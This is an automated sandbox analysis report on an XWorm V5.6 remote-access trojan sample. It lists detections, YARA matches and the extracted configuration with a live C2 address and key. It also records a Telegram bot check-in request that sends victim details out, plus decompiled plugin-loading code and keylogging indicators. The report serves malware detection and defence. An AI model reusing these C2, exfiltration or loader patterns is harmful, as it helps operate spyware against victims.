Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
XClient.exe

Overview

General Information

Sample name:XClient.exe
Analysis ID:1582524
MD5:ca1b3f03551f41b8c83217c3af2b0d3c
SHA1:7cebd14139aad3b194080a7210c78a6587de1de5
SHA256:e62ef733237ababe82f6b2109c70159744994515bc941b8ed025de10bb8aa624
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64_ra
  • XClient.exe (PID: 6524 cmdline: "C:\Users\user\Desktop\XClient.exe" MD5: CA1B3F03551F41B8C83217C3AF2B0D3C)
  • XClient.exe (PID: 4992 cmdline: "C:\Users\user\Desktop\XClient.exe" MD5: CA1B3F03551F41B8C83217C3AF2B0D3C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["144.48.105.119"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
XClient.exeJoeSecurity_XWormYara detected XWormJoe Security
    XClient.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      XClient.exerat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
      • 0x6e76:$str01: $VB$Local_Port
      • 0x6e67:$str02: $VB$Local_Host
      • 0x70d3:$str03: get_Jpeg
      • 0x6b52:$str04: get_ServicePack
      • 0x7ef7:$str05: Select * from AntivirusProduct
      • 0x80f5:$str06: PCRestart
      • 0x8109:$str07: shutdown.exe /f /r /t 0
      • 0x81bb:$str08: StopReport
      • 0x8191:$str09: StopDDos
      • 0x8287:$str10: sendPlugin
      • 0x8425:$str12: -ExecutionPolicy Bypass -File "
      • 0x854e:$str13: Content-length: 5235
      XClient.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x88d7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x8974:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x8a89:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x8469:$cnc4: POST / HTTP/1.1

      PCAP (Network Traffic)

      SourceRuleDescriptionAuthorStrings
      sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000000.00000000.1140164033.00000000009B2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          00000000.00000000.1140164033.00000000009B2000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x86d7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x8774:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x8889:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x8269:$cnc4: POST / HTTP/1.1
          Process Memory Space: XClient.exe PID: 6524JoeSecurity_XWormYara detected XWormJoe Security
            Process Memory Space: XClient.exe PID: 6524JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.0.XClient.exe.9b0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                0.0.XClient.exe.9b0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  0.0.XClient.exe.9b0000.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
                  • 0x6e76:$str01: $VB$Local_Port
                  • 0x6e67:$str02: $VB$Local_Host
                  • 0x70d3:$str03: get_Jpeg
                  • 0x6b52:$str04: get_ServicePack
                  • 0x7ef7:$str05: Select * from AntivirusProduct
                  • 0x80f5:$str06: PCRestart
                  • 0x8109:$str07: shutdown.exe /f /r /t 0
                  • 0x81bb:$str08: StopReport
                  • 0x8191:$str09: StopDDos
                  • 0x8287:$str10: sendPlugin
                  • 0x8425:$str12: -ExecutionPolicy Bypass -File "
                  • 0x854e:$str13: Content-length: 5235
                  0.0.XClient.exe.9b0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                  • 0x88d7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                  • 0x8974:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                  • 0x8a89:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                  • 0x8469:$cnc4: POST / HTTP/1.1

                  Sigma Signatures

                  No Sigma rule has matched

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-30T20:13:41.777567+010028536851A Network Trojan was detected192.168.2.1649702149.154.167.220443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-30T20:14:59.749315+010028559241Malware Command and Control Activity Detected192.168.2.1649733144.48.105.1197000TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-30T20:13:41.777567+010018100071Potentially Bad Traffic192.168.2.1649702149.154.167.220443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: XClient.exeAvira: detected
                  Found malware configuration
                  Source: XClient.exeMalware Configuration Extractor: Xworm {"C2 url": ["144.48.105.119"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                  Multi AV Scanner detection for submitted file
                  Source: XClient.exeReversingLabs: Detection: 76%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for sample
                  Source: XClient.exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: XClient.exeString decryptor: 144.48.105.119
                  Source: XClient.exeString decryptor: 7000
                  Source: XClient.exeString decryptor: <123456789>
                  Source: XClient.exeString decryptor: <Xwormmm>
                  Source: XClient.exeString decryptor: XWorm V5.6
                  Source: XClient.exeString decryptor: USB.exe
                  Source: XClient.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.16:49702 version: TLS 1.2
                  Source: XClient.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.16:49733 -> 144.48.105.119:7000
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.16:49702 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.16:49702 -> 149.154.167.220:443
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: 144.48.105.119
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: XClient.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.XClient.exe.9b0000.0.unpack, type: UNPACKEDPE
                  Source: global trafficTCP traffic: 192.168.2.16:49703 -> 144.48.105.119:7000
                  Source: global trafficHTTP traffic detected: GET /botYour_Token/sendMessage?chat_id=6170564111&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A7711B137F8E174C9CF15%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20ZLSGWO%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewASN Name: DEDICATEDUS DEDICATEDUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.48.105.119
                  Source: global trafficHTTP traffic detected: GET /botYour_Token/sendMessage?chat_id=6170564111&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A7711B137F8E174C9CF15%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20ZLSGWO%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 30 Dec 2024 19:13:41 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: XClient.exe, 00000000.00000002.2402286197.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: XClient.exeString found in binary or memory: https://api.telegram.org/bot
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.16:49702 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to log keystrokes (.Net Source)
                  Source: XClient.exe, XLogger.cs.Net Code: KeyboardLayout
                  Source: C:\Users\user\Desktop\XClient.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: XClient.exe, type: SAMPLEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                  Source: XClient.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 0.0.XClient.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                  Source: 0.0.XClient.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 00000000.00000000.1140164033.00000000009B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: C:\Users\user\Desktop\XClient.exeProcess Stats: CPU usage > 24%
                  Source: XClient.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: XClient.exe, type: SAMPLEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                  Source: XClient.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0.0.XClient.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                  Source: 0.0.XClient.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000000.00000000.1140164033.00000000009B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: XClient.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: XClient.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: XClient.exe, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                  Source: XClient.exe, Settings.csBase64 encoded string: 'RyFdRXkpkSJGrZcI9Q/RAGUnv1WiHRoheOtS1xRCYyK4xl0FuCqakUfuj2o0HJW9', 'Ht531Lbiy/LKaeaEpNz/9rwnuEpc30YxRsPKnaINdlBP/nlOe2qifWCQwczHiGKD'
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/0@1/2
                  Source: C:\Users\user\Desktop\XClient.exeMutant created: \Sessions\1\BaseNamedObjects\uaKK8Ao8mnFguQUo
                  Source: C:\Users\user\Desktop\XClient.exeMutant created: NULL
                  Source: XClient.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: XClient.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\XClient.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: XClient.exeReversingLabs: Detection: 76%
                  Source: unknownProcess created: C:\Users\user\Desktop\XClient.exe "C:\Users\user\Desktop\XClient.exe"
                  Source: unknownProcess created: C:\Users\user\Desktop\XClient.exe "C:\Users\user\Desktop\XClient.exe"
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: avicap32.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                  Source: XClient.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: XClient.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  .NET source code contains method to dynamically call methods (often used by packers)
                  Source: XClient.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: XClient.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  .NET source code contains potential unpacker
                  Source: XClient.exe, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                  Source: XClient.exe, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                  Source: XClient.exe, Messages.cs.Net Code: Memory
                  Source: C:\Users\user\Desktop\XClient.exeCode function: 0_2_00007FFEC82A9A3D push ebx; iretd 0_2_00007FFEC82A9A4A
                  Source: C:\Users\user\Desktop\XClient.exeCode function: 0_2_00007FFEC82A2E37 push ebx; retf 0_2_00007FFEC82A2E3A
                  Source: C:\Users\user\Desktop\XClient.exeCode function: 0_2_00007FFEC82A0600 push ebx; retf 0_2_00007FFEC82A060A
                  Source: C:\Users\user\Desktop\XClient.exeCode function: 0_2_00007FFEC82A06DA push ebx; retf 0_2_00007FFEC82A06EA
                  Source: C:\Users\user\Desktop\XClient.exeCode function: 12_2_00007FFEC82A06DA push ebx; retf 12_2_00007FFEC82A06EA
                  Source: C:\Users\user\Desktop\XClient.exeCode function: 12_2_00007FFEC82A0600 push ebx; retf 12_2_00007FFEC82A060A
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
